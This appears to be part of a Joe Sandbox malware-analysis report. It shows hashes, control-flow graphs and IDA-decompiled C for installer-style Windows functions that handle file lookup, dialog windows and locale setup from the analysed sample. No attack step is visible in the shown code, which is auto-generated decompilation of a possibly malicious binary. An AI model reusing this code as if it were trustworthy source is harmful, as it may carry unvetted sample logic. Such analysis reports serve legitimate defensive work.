                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                  • Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
                                  • Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                  • Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 707 40683d-406851 FindFirstFileW 708 406853-40685c FindClose 707->708 709 40685e 707->709 710 406860-406861 708->710 709->710
                                  C-Code - Quality: 100%
                                  			E0040683D(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426758); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426758;
			}




                                  0x00406848
                                  0x00406851
                                  0x00000000
                                  0x0040685e
                                  0x00406854
                                  0x00000000

                                  APIs
                                  • FindFirstFileW.KERNELBASE(7620FAA0,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\), ref: 00406848
                                  • FindClose.KERNEL32(00000000), ref: 00406854
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID: XgB
                                  • API String ID: 2295610775-796949446
                                  • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                  • Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
                                  • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                  • Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 141 403f64-403f76 142 403f7c-403f82 141->142 143 4040dd-4040ec 141->143 142->143 146 403f88-403f91 142->146 144 40413b-404150 143->144 145 4040ee-404129 GetDlgItem * 2 call 404463 KiUserCallbackDispatcher call 40140b 143->145 148 404190-404195 call 4044af 144->148 149 404152-404155 144->149 167 40412e-404136 145->167 150 403f93-403fa0 SetWindowPos 146->150 151 403fa6-403fad 146->151 165 40419a-4041b5 148->165 153 404157-404162 call 401389 149->153 154 404188-40418a 149->154 150->151 156 403ff1-403ff7 151->156 157 403faf-403fc9 ShowWindow 151->157 153->154 181 404164-404183 SendMessageW 153->181 154->148 164 404430 154->164 161 404010-404013 156->161 162 403ff9-40400b DestroyWindow 156->162 158 4040ca-4040d8 call 4044ca 157->158 159 403fcf-403fe2 GetWindowLongW 157->159 169 404432-404439 158->169 159->158 166 403fe8-403feb ShowWindow 159->166 170 404015-404021 SetWindowLongW 161->170 171 404026-40402c 161->171 168 40440d-404413 162->168 164->169 174 4041b7-4041b9 call 40140b 165->174 175 4041be-4041c4 165->175 166->156 167->144 168->164 177 404415-40441b 168->177 170->169 171->158 180 404032-404041 GetDlgItem 171->180 174->175 178 4041ca-4041d5 175->178 179 4043ee-404407 DestroyWindow EndDialog 175->179 177->164 183 40441d-404426 ShowWindow 177->183 178->179 184 4041db-404228 call 406544 call 404463 * 3 GetDlgItem 178->184 179->168 185 404060-404063 180->185 186 404043-40405a SendMessageW IsWindowEnabled 180->186 181->169 183->164 213 404232-40426e ShowWindow EnableWindow call 404485 EnableWindow 184->213 214 40422a-40422f 184->214 188 404065-404066 185->188 189 404068-40406b 185->189 186->164 186->185 191 404096-40409b call 40443c 188->191 192 404079-40407e 189->192 193 40406d-404073 189->193 191->158 196 4040b4-4040c4 SendMessageW 192->196 198 404080-404086 192->198 193->196 197 404075-404077 193->197 196->158 197->191 199 404088-40408e call 40140b 198->199 200 40409d-4040a6 call 40140b 198->200 209 404094 199->209 200->158 210 4040a8-4040b2 200->210 209->191 210->209 217 404270-404271 213->217 218 404273 213->218 214->213 219 404275-4042a3 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 4042a5-4042b6 SendMessageW 219->220 221 4042b8 219->221 222 4042be-4042fd call 404498 call 403f45 call 406507 lstrlenW call 406544 SetWindowTextW call 401389 220->222 221->222 222->165 233 404303-404305 222->233 233->165 234 40430b-40430f 233->234 235 404311-404317 234->235 236 40432e-404342 DestroyWindow 234->236 235->164 237 40431d-404323 235->237 236->168 238 404348-404375 CreateDialogParamW 236->238 237->165 239 404329 237->239 238->168 240 40437b-4043d2 call 404463 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->164 240->164 245 4043d4-4043ec ShowWindow call 4044af 240->245 245->168
                                  C-Code - Quality: 84%
                                  			E00403F64(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x4236f0 = _t34;
					if(_t130 == 0x110) {
						 *0x42a228 = _t127;
						 *0x423704 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216d0 = _t91;
						E00404463(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429208); // executed
						 *0x4291ec = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x4236f0 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a240;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044AF(0x40b);
						while(1) {
							_t36 =  *0x4236f0;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x42a244;
							if(_t38 ==  *0x42a244) {
								E0040140B(1);
							}
							__eflags =  *0x4291ec - _t136;
							if( *0x4291ec != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x42a244; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E00406544(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404463(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404463(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404463(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ac - _t136;
							_v28 = _t48;
							if( *0x42a2ac != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E00404485(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x4216d0, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ac - _t136;
							if( *0x42a2ac == _t136) {
								_push( *0x423704);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x4216d0);
							}
							E00404498();
							E00406507(0x423708, E00403F45());
							E00406544(0x423708, _t127, _t133,  &(0x423708[lstrlenW(0x423708)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423708);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x4291f8);
									 *0x4226e0 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a220,  *_t133 +  *0x429200 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "\"F@"), _t133);
									__eflags = _t73 - _t136;
									 *0x4291f8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404463(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x4291f8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x4291ec - _t136;
									if( *0x4291ec != _t136) {
										goto L63;
									}
									ShowWindow( *0x4291f8, 8);
									E004044AF(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ac - _t136;
								if( *0x42a2ac != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2a0 - _t136;
								if( *0x42a2a0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x4291f8); // executed
						 *0x42a228 = _t136;
						EndDialog(_t127,  *0x421ed8);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x4291f8, 0x40f, 0, 1);
						__eflags =  *0x4291ec;
						return 0 |  *0x4291ec == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x4236e8, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x4291f8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ac - _t136;
											if( *0x42a2ac == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421ed8 = 1;
												L23:
												_push(0x78);
												L24:
												E0040443C();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421ed8 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x4291f8);
						 *0x4291f8 = _t122;
						L60:
						_t145 =  *0x425708 - _t136; // 0x0
						if(_t145 == 0 &&  *0x4291f8 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425708 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x4236e8,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E004044CA(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                                  0x00403f6f
                                  0x00403f76
                                  0x004040dd
                                  0x004040e1
                                  0x004040e5
                                  0x004040e7
                                  0x004040ec
                                  0x004040f7
                                  0x00404102
                                  0x00404107
                                  0x00404109
                                  0x0040410b
                                  0x0040410e
                                  0x00404113
                                  0x00404121
                                  0x0040412e
                                  0x00404135
                                  0x00404135
                                  0x00404136
                                  0x00404136
                                  0x0040413b
                                  0x00404141
                                  0x00404148
                                  0x0040414e
                                  0x00404150
                                  0x00404190
                                  0x00404195
                                  0x0040419a
                                  0x0040419a
                                  0x0040419f
                                  0x004041a8
                                  0x004041aa
                                  0x004041af
                                  0x004041b5
                                  0x004041b9
                                  0x004041b9
                                  0x004041be
                                  0x004041c4
                                  0x00000000
                                  0x00000000
                                  0x004041cf
                                  0x004041d5
                                  0x00000000
                                  0x00000000
                                  0x004041de
                                  0x004041e6
                                  0x004041eb
                                  0x004041ee
                                  0x004041f4
                                  0x004041f9
                                  0x004041fc
                                  0x00404202
                                  0x00404207
                                  0x0040420a
                                  0x00404210
                                  0x00404218
                                  0x0040421e
                                  0x00404224
                                  0x00404228
                                  0x0040422f
                                  0x0040422f
                                  0x0040422f
                                  0x00404239
                                  0x0040424b
                                  0x00404257
                                  0x0040425c
                                  0x00404266
                                  0x0040426c
                                  0x0040426e
                                  0x00404273
                                  0x00404270
                                  0x00404270
                                  0x00404270
                                  0x00404283
                                  0x0040429b
                                  0x0040429d
                                  0x004042a3
                                  0x004042b8
                                  0x004042a5
                                  0x004042ae
                                  0x004042b0
                                  0x004042b0
                                  0x004042be
                                  0x004042cf
                                  0x004042e5
                                  0x004042ec
                                  0x004042f2
                                  0x004042f6
                                  0x004042fb
                                  0x004042fd
                                  0x00000000
                                  0x00404303
                                  0x00404303
                                  0x00404305
                                  0x00000000
                                  0x00000000
                                  0x0040430b
                                  0x0040430f
                                  0x00404334
                                  0x0040433a
                                  0x00404340
                                  0x00404342
                                  0x00000000
                                  0x00000000
                                  0x00404368
                                  0x0040436e
                                  0x00404370
                                  0x00404375
                                  0x00000000
                                  0x00000000
                                  0x0040437b
                                  0x0040437e
                                  0x00404381
                                  0x00404398
                                  0x004043a4
                                  0x004043bd
                                  0x004043c3
                                  0x004043c7
                                  0x004043cc
                                  0x004043d2
                                  0x00000000
                                  0x00000000
                                  0x004043dc
                                  0x004043e7
                                  0x00000000
                                  0x004043e7
                                  0x00404311
                                  0x00404317
                                  0x00000000
                                  0x00000000
                                  0x0040431d
                                  0x00404323
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404329
                                  0x004042fd
                                  0x004043f4
                                  0x00404400
                                  0x00404407
                                  0x00000000
                                  0x00404152
                                  0x00404152
                                  0x00404155
                                  0x00404188
                                  0x00404188
                                  0x0040418a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040418a
                                  0x00404157
                                  0x0040415b
                                  0x00404160
                                  0x00404162
                                  0x00000000
                                  0x00000000
                                  0x00404172
                                  0x0040417a
                                  0x00000000
                                  0x00404180
                                  0x00403f88
                                  0x00403f88
                                  0x00403f8c
                                  0x00403f91
                                  0x00403fa0
                                  0x00403fa0
                                  0x00403fa6
                                  0x00403fad
                                  0x00403ff1
                                  0x00403ff7
                                  0x00404010
                                  0x00404013
                                  0x00404026
                                  0x0040402c
                                  0x00000000
                                  0x00000000
                                  0x00404032
                                  0x0040403d
                                  0x0040403f
                                  0x00404041
                                  0x00404060
                                  0x00404060
                                  0x00404063
                                  0x00404068
                                  0x0040406b
                                  0x0040407b
                                  0x0040407c
                                  0x0040407e
                                  0x004040b4
                                  0x004040c4
                                  0x00000000
                                  0x004040c4
                                  0x00404080
                                  0x00404086
                                  0x0040409f
                                  0x004040a4
                                  0x004040a6
                                  0x00000000
                                  0x00000000
                                  0x004040a8
                                  0x00404094
                                  0x00404094
                                  0x00404096
                                  0x00404096
                                  0x00000000
                                  0x00404096
                                  0x00404089
                                  0x0040408e
                                  0x00000000
                                  0x0040408e
                                  0x0040406d
                                  0x00404073
                                  0x00000000
                                  0x00000000
                                  0x00404075
                                  0x00000000
                                  0x00404075
                                  0x00404065
                                  0x00000000
                                  0x00404065
                                  0x0040404b
                                  0x00404052
                                  0x00404058
                                  0x0040405a
                                  0x00404430
                                  0x00000000
                                  0x00404430
                                  0x00000000
                                  0x0040405a
                                  0x00404018
                                  0x00000000
                                  0x00404020
                                  0x00403fff
                                  0x00404005
                                  0x0040440d
                                  0x0040440d
                                  0x00404413
                                  0x00404420
                                  0x00404426
                                  0x00404426
                                  0x00000000
                                  0x00403faf
                                  0x00403fb4
                                  0x00403fc0
                                  0x00403fc9
                                  0x004040ca
                                  0x00000000
                                  0x00403fe8
                                  0x00403feb
                                  0x00000000
                                  0x00403feb
                                  0x00403fc9
                                  0x00403fad

                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                                  • ShowWindow.USER32(?), ref: 00403FC0
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
                                  • ShowWindow.USER32(?,00000004), ref: 00403FEB
                                  • DestroyWindow.USER32 ref: 00403FFF
                                  • SetWindowLongW.USER32 ref: 00404018
                                  • GetDlgItem.USER32 ref: 00404037
                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                                  • IsWindowEnabled.USER32(00000000), ref: 00404052
                                  • GetDlgItem.USER32 ref: 004040FD
                                  • GetDlgItem.USER32 ref: 00404107
                                  • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404121
                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
                                  • GetDlgItem.USER32 ref: 00404218
                                  • ShowWindow.USER32(00000000,?), ref: 00404239
                                  • EnableWindow.USER32(?,?), ref: 0040424B
                                  • EnableWindow.USER32(?,?), ref: 00404266
                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
                                  • EnableMenuItem.USER32 ref: 00404283
                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
                                  • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
                                  • SetWindowTextW.USER32(?,00423708), ref: 004042EC
                                  • ShowWindow.USER32(?,0000000A), ref: 00404420
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                  • String ID:
                                  • API String ID: 2475350683-0
                                  • Opcode ID: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
                                  • Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
                                  • Opcode Fuzzy Hash: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
                                  • Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403BB6 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 215stringregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 248 403bb6-403bce call 4068d4 251 403bd0-403bdb GetUserDefaultUILanguage call 40644e 248->251 252 403be2-403c19 call 4063d5 248->252 255 403be0 251->255 258 403c31-403c37 lstrcatW 252->258 259 403c1b-403c2c call 4063d5 252->259 257 403c3c-403c65 call 403e8c call 405ede 255->257 265 403cf7-403cff call 405ede 257->265 266 403c6b-403c70 257->266 258->257 259->258 272 403d01-403d08 call 406544 265->272 273 403d0d-403d32 LoadImageW 265->273 266->265 267 403c76-403c9e call 4063d5 266->267 267->265 274 403ca0-403ca4 267->274 272->273 276 403db3-403dbb call 40140b 273->276 277 403d34-403d64 RegisterClassW 273->277 279 403cb6-403cc2 lstrlenW 274->279 280 403ca6-403cb3 call 405e03 274->280 288 403dc5-403dd0 call 403e8c 276->288 289 403dbd-403dc0 276->289 281 403e82 277->281 282 403d6a-403dae SystemParametersInfoW CreateWindowExW 277->282 286 403cc4-403cd2 lstrcmpiW 279->286 287 403cea-403cf2 call 405dd6 call 406507 279->287 280->279 285 403e84-403e8b 281->285 282->276 286->287 292 403cd4-403cde GetFileAttributesW 286->292 287->265 300 403dd6-403df0 ShowWindow call 406864 288->300 301 403e59-403e61 call 40563c 288->301 289->285 293 403ce0-403ce2 292->293 294 403ce4-403ce5 call 405e22 292->294 293->287 293->294 294->287 308 403df2-403df7 call 406864 300->308 309 403dfc-403e0e GetClassInfoW 300->309 306 403e63-403e69 301->306 307 403e7b-403e7d call 40140b 301->307 306->289 310 403e6f-403e76 call 40140b 306->310 307->281 308->309 313 403e10-403e20 GetClassInfoW RegisterClassW 309->313 314 403e26-403e49 DialogBoxParamW call 40140b 309->314 310->289 313->314 318 403e4e-403e57 call 403b06 314->318 318->285
                                  C-Code - Quality: 96%
                                  			E00403BB6(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a230;
				_t22 = E004068D4(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423708;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E004063D5(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423708, 0);
					__eflags =  *0x423708;
					if(__eflags == 0) {
						E004063D5(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423708, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E0040644E(L"1033", _t73 & 0x0000ffff);
				}
				E00403E8C(_t78, _t90);
				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42a2a0 =  *0x42a238 & 0x00000020;
				 *0x42a2bc = 0x10000;
				if(E00405EDE(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405EDE(_t98, _t86) == 0) {
						E00406544(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a220, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429208 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403E8C(_t78, __eflags);
							__eflags =  *0x42a2c0;
							if( *0x42a2c0 != 0) {
								_t33 = E0040563C(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x4291ec;
								if( *0x4291ec == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x4236e8, 5); // executed
							_t39 = E00406864("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E00406864("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291c0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291c0);
								 *0x4291e4 = _t87;
								RegisterClassW(0x4291c0);
							}
							_t44 = DialogBoxParamW( *0x42a220,  *0x429200 + 0x00000069 & 0x0000ffff, 0, E00403F64, 0); // executed
							E00403B06(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a220;
						 *0x4291c4 = E00401000;
						 *0x4291d0 =  *0x42a220;
						 *0x4291d4 = _t30;
						 *0x4291e4 = 0x40a380;
						if(RegisterClassW(0x4291c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x4236e8 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a220, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x4281c0;
					E004063D5(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a258 + _t78 * 2,  *0x42a258 +  *(_t82 + 0x4c) * 2, 0x4281c0, 0);
					_t63 =  *0x4281c0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281c2;
						 *((short*)(E00405E03(0x4281c2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406507(_t86, E00405DD6(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
